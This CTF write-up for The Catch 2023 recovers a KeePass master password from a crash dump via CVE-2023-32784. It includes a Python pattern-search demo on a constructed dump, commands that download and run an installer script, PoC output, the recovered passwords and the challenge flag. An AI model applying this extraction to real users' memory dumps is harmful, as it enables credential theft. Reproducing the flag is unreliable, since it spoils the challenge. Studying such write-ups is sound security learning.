# Captain's Password

This is a write-up for a challenge at The Catch 2023 CTF.

## The Assignment

The assignment:

> Ahoy, officer,
>
> our **captain** has had too much naval espresso and is temporarily **unfit** for duty. The **chief officer** is in command now, but he **does not know the captain's passwords** for key ship systems. Good news is that the captain uses a password manager, and the ship's chief engineer was able to acquire the captain's computer memory crash dump. Your task is to acquire the password for the signalization system.
>
> May you have fair winds and following seas!
>
> Download the database and memory dump.

Attached were two files, `captain.kdbx` and `crashdump.dmp`. The hint was:

> At first, identify the password manager.

`kdbx` is the extension that the **KeePass** password manager uses. To access the content, we needed the **master password**. There was a vulnerability ([CVE-2023-32784](https://nvd.nist.gov/vuln/detail/CVE-2023-32784)) in KeePass, which we learned about by searching for "memory dump keepass."

## [CVE-2023-32784](https://nvd.nist.gov/vuln/detail/CVE-2023-32784): How It Works

From a [PoC README on GitHub](https://github.com/vdohney/keepass-password-dumper):

> KeePass 2.X uses a custom-developed text box for password entry, SecureTextBoxEx. This text box is not only used for the master password entry, but in other places in KeePass as well, like password edit boxes (so the attack can also be used to recover their contents).
>
> The flaw exploited here is that **for every character** typed, **a leftover string is created in memory.** Because of how .NET works, it is nearly impossible to get rid of it once it gets created. For example, when "Password" is typed, it will result in these leftover strings: **•a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d.**

The PoC application **searches the dump for these patterns** and offers a likely password character for each position in the password.
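To make the README's description concrete, here is an added Python illustration of that pattern search (it is not the PoC's code and not part of the original write-up). It constructs a toy "dump" containing the leftover strings for the README's "Password" example plus two decoy strings, then scans it the way the README describes: a run of n mask characters followed by one character yields a candidate for position n+1. It assumes the mask character is U+25CF (the "●" the PoC prints) and that strings are laid out as UTF-16LE, as .NET stores them; the function names are my own.

```python
import re
from collections import Counter

# Assumption: the masking character is U+25CF, the "●" shown in the PoC output.
MASK = "\u25cf"
MASK_UTF16 = MASK.encode("utf-16-le")   # b'\xcf\x25' inside a .NET process (UTF-16LE strings)

# One run of mask characters followed by exactly one UTF-16 code unit.
# The negative lookbehind makes each match start at the beginning of a run.
LEFTOVER_RE = re.compile(rb"(?<!\xcf\x25)((?:\xcf\x25)+)(..)", re.DOTALL)


def build_demo_dump(typed: str, extra: tuple[str, ...] = (),
                    filler: bytes = b"\x00" * 32) -> bytes:
    """Construct a toy 'memory dump': the leftover strings the text box leaves
    behind while `typed` is entered one character at a time, plus any `extra`
    decoy strings, separated by filler bytes. Constructed data, not a real dump."""
    leftovers = [MASK * i + typed[i] for i in range(1, len(typed))]
    leftovers.extend(extra)
    body = filler.join(s.encode("utf-16-le") for s in leftovers)
    return filler + body + filler


def find_candidates(dump: bytes) -> dict[int, Counter]:
    """Map each 1-based password position to a Counter of candidate characters.
    A run of n masks followed by character c means c was typed at position n+1."""
    candidates: dict[int, Counter] = {}
    for m in LEFTOVER_RE.finditer(dump):
        n_masks = len(m.group(1)) // 2
        try:
            ch = m.group(2).decode("utf-16-le")
        except UnicodeDecodeError:      # lone surrogate half: not a character
            continue
        if not ch.isprintable():        # NUL padding, control bytes, etc.
            continue
        candidates.setdefault(n_masks + 1, Counter())[ch] += 1
    return candidates


def combine(candidates: dict[int, Counter]) -> str:
    """Render a PoC-style 'Combined' line. Position 1 is never recoverable (no
    leftover string exists for it); ambiguous positions are shown as {a, b},
    ordered by how often each candidate was seen."""
    if not candidates:
        return ""
    out = [MASK]
    for pos in range(2, max(candidates) + 1):
        ranked = candidates.get(pos, Counter()).most_common()
        if not ranked:
            out.append(MASK)
        elif len(ranked) == 1:
            out.append(ranked[0][0])
        else:
            out.append("{" + ", ".join(ch for ch, _ in ranked) + "}")
    return "".join(out)


if __name__ == "__main__":
    dump = build_demo_dump("Password", extra=(MASK + "x", MASK + "a"))
    found = find_candidates(dump)
    for pos in sorted(found):
        print(f"{pos}.: " + ", ".join(found[pos]))
    print("Combined:", combine(found))
```

Running it prints one candidate line per position and `Combined: ●{a, x}ssword`, the same shape as the real PoC output below: the first character is always unknown, and a position can carry several candidates when unrelated strings happen to share the mask prefix. The point for defenders is that a masked text box hides the password on screen but does nothing about copies left in managed memory, which is why a crash dump alone was enough here; KeePass addressed this in version 2.54.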
## Running the PoC

We might need to install the correct version of .NET first:

```bash
$ wget https://dot.net/v1/dotnet-install.sh -O dotnet-install.sh
$ chmod +x dotnet-install.sh
$ ./dotnet-install.sh --channel 7.0
```

We ran the PoC from the directory where we cloned [the GitHub repository](https://github.com/vdohney/keepass-password-dumper):

```
$ ~/.dotnet/dotnet run ../crashdump.dmp
Unknown characters are displayed as "●"
1.: ●
2.: ), ÿ, a, :, |, í, W, 5, , r, ¸,
3.: s,
4.: s,
5.: w,
6.: o,
7.: r,
8.: d,
9.: 4,
10.: m,
11.: y,
12.: p,
13.: r,
14.: e,
15.: c,
16.: i,
17.: o,
18.: u,
19.: s,
20.: s,
21.: h,
22.: i,
23.: p,
Combined: ●{), ÿ, a, :, |, í, W, 5, , r, ¸}ssword4mypreciousship
```

From the output, we could guess that the correct password was: `password4mypreciousship`

### Entries in the database

We could open the database in KeePass, KeePassX, or KeePassXC. Some notable entries were:

* Warehouse Management
  * rumrumrum3
* Fire Extinguishing System
  * Fire!Fire!Fire!
* wifi-crew
  * username: captain
  * password: obvious

If we were only interested in the flag and not the jokes, we could use the search function (being the *Captain Obvious* now) and search for "flag":

* Main Flag System
  * FLAG{pyeB-941A-bhGx-g3RI}